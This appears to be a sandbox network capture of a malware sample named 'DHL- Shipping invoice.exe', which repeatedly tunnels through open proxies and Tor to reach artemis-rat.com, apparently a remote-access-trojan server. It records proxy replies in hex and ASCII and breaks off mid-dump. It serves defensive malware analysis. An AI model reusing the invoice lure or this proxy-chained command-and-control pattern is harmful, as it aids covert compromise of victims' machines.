                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:06.199347973 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1625192.168.2.45495943.134.167.514436484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:06.200181961 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1626192.168.2.4547108.217.95.4488996484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:06.200261116 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1627192.168.2.45496054.38.187.1774436484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:06.200351000 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1628192.168.2.454815162.214.170.144253476484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:06.203598976 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:06.765670061 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1629192.168.2.454718198.44.255.3806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:06.205701113 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1630192.168.2.454709153.99.63.14380006484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:06.206903934 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1631192.168.2.45306523.94.123.24388886484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:06.207911015 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:09.239981890 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:12.250355005 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:26.386929989 CET84INHTTP/1.1 200 OK
                            Date: Tue, 12 Mar 2024 07:37:26 GMT
                            Transfer-Encoding: chunked


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1632192.168.2.454861172.67.182.78806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:06.216161013 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:06.303592920 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:37:06 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1633192.168.2.45484637.120.239.191806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:06.218787909 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1634192.168.2.45499247.242.34.834436484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:06.221683025 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1635192.168.2.453103151.236.39.7572486484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:06.223283052 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:09.250169992 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:12.250233889 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:18.265691996 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:30.281043053 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1636192.168.2.45499447.242.34.834436484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:06.223953962 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1637192.168.2.454866162.159.242.10806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:06.224112988 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:06.311444998 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:37:06 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1638192.168.2.45499547.242.34.834436484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:06.225188017 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1639192.168.2.45499647.242.34.834436484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:06.226427078 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1640192.168.2.45421494.23.252.16891806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:06.226743937 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1641192.168.2.454812213.14.32.7841536484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:06.234396935 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1642192.168.2.454886104.16.108.234806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:06.236758947 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:06.323915958 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:37:06 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1643192.168.2.454734110.12.211.140806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:06.237288952 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1644192.168.2.453153164.92.237.188532386484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:06.238557100 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:09.250150919 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:12.250240088 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:18.265729904 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1645192.168.2.454730115.84.248.14080806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:06.242491007 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Mar 12, 2024 08:37:06.550474882 CET1286INHTTP/1.1 200 OK
                            Date: Tue, 12 Mar 2024 07:37:06 GMT
                            Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.1e-fips mod_fcgid/2.3.9 PHP/5.6.40
                            X-Powered-By: PHP/5.6.40
                            Cache-Control: max-age=0, no-cache, no-store, must-revalidate
                            Pragma: no-cache
                            Expires: Wed, 11 Jan 1984 05:00:00 GMT
                            Content-Length: 3172
                            Content-Type: text/html; charset=UTF-8
                            Data Raw: 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 54 68 65 20 55 6e 69 66 6f 72 6d 20 53 65 72 76 65 72 20 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 44 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 54 68 65 20 55 6e 69 66 6f 72 6d 20 53 65 72 76 65 72 20 5a 65 72 6f 20 31 31 2e 32 2e 30 22 20 2f 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 4b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 54 68 65 20 55 6e 69 66 6f 72 6d 20 53 65 72 76 65 72 2c 20 4d 50 47 2c 20 4d 69 6b 65 20 47 6c 65 61 76 65 73 2c 20 52 69 63 2c 20 55 6e 69 53 65 72 76 65 72 2c 20 4f 6c 61 6a 69 64 65 2c 20 42 6f 62 53 20 22 20 2f 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 63 73 73 2f 73 74 79 6c 65 2e 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 20 2f 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 2f 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2f 0d 0a 2e 69 6e 74 72 6f 7b 0d 0a 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 33 30 70 78 3b 0d 0a 20 20 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 0d 0a 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 0d 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 3b 0d 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 45 37 45 37 46 44 3b 0d 0a 7d 0d 0a 2f 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2f 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 0d 0a 3c 62 6f 64 79 3e 0d 0a 0d 0a 3c 64 69 76 20 69 64 3d 22 77 72 61 70 22 3e 0d 0a 20 20 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 0d 0a 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 75 6e 69 66 6f 72 6d 73 65 72 76 65 72 2e 63 6f 6d 22 3e 3c 69 6d 67 20 73 72 63 3d 22 69 6d 61 67 65 73 2f 6c 6f 67 6f 2e 70 6e 67 22 20 61 6c 69 67 6e 3d 22 6c 65 66 74 22 20 61 6c 74 3d 22 54 68 65 20 55 6e 69 66 6f 72 6d 20 53 65 72 76 65 72 22
                            Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html;charset=utf-8" /><title>The Uniform Server </title><meta name="Description" content="The Uniform Server Zero 11.2.0" /><meta name="Keywords" content="The Uniform Server, MPG, Mike Gleaves, Ric, UniServer, Olajide, BobS " /><link rel="stylesheet" type="text/css" href="css/style.css" media="screen" /></head><style type="text/css">/*****************************************/.intro{ margin-top:30px; padding:10px; font-size:12px; font-family:Verdana; background-color: #E7E7FD;}/*****************************************/</style><body><div id="wrap"> <div id="header"> <a href="http://www.uniformserver.com"><img src="images/logo.png" align="left" alt="The Uniform Server"
                            Mar 12, 2024 08:37:06.858746052 CET454INHTTP/1.1 400 Bad Request
                            Date: Tue, 12 Mar 2024 07:37:06 GMT
                            Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.1e-fips mod_fcgid/2.3.9 PHP/5.6.40
                            Content-Length: 226
                            Connection: close
                            Content-Type: text/html; charset=iso-8859-1
                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1646192.168.2.454726103.166.141.74200746484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:06.247023106 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:06.618742943 CET39INHTTP/1.1 200 Connection established


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1647192.168.2.454159162.55.87.4855666484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:06.251487970 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:09.359146118 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:09.540937901 CET536INHTTP/1.0 501 Tor is not an HTTP Proxy
                            Content-Type: text/html; charset=iso-8859-1
                            Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 53 20 50 72 6f 78 79 2c 20 4e 6f 74 20 41 6e 20 48 54 54 50 20 50 72 6f 78 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 73 20 70 72 6f 78 79 2c 20 6e 6f 74 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 3c 2f 68 31 3e 0a 3c 70 3e 0a 49 74 20 61 70 70 65 61 72 73 20 79 6f 75 20 68 61 76 65 20 63 6f 6e 66 69 67 75 72 65 64 20 79 6f 75 72 20 77 65 62 20 62 72 6f 77 73 65 72 20 74 6f 20 75 73 65 20 74 68 69 73 20 54 6f 72 20 70 6f 72 74 20 61 73 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 0a 3c 2f 70 3e 3c 70 3e 0a 54 68 69 73 20 69 73 20 6e 6f 74 20 63 6f 72 72 65 63 74 3a 20 54 68 69 73 20 70 6f 72 74 20 69 73 20 63 6f 6e 66 69 67 75 72 65 64 20 61 73 20 61 20 53 4f 43 4b 53 20 70 72 6f 78 79 2c 20 6e 6f 74 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 20 49 66 20 79 6f 75 20 6e 65 65 64 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 20 74 75 6e 6e 65 6c 2c 20 75 73 65 20 74 68 65 20 48 54 54 50 54 75 6e 6e 65 6c 50 6f 72 74 0a 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 6f 70 74 69 6f 6e 20 69 6e 20 70 6c 61 63 65 20 6f 66 2c 20 6f 72 20 69 6e 20 61 64 64 69 74 69 6f 6e 20 74 6f 2c 20 53 4f 43 4b 53 50 6f 72 74 2e 0a 50 6c 65 61 73 65 20 63 6f 6e 66 69
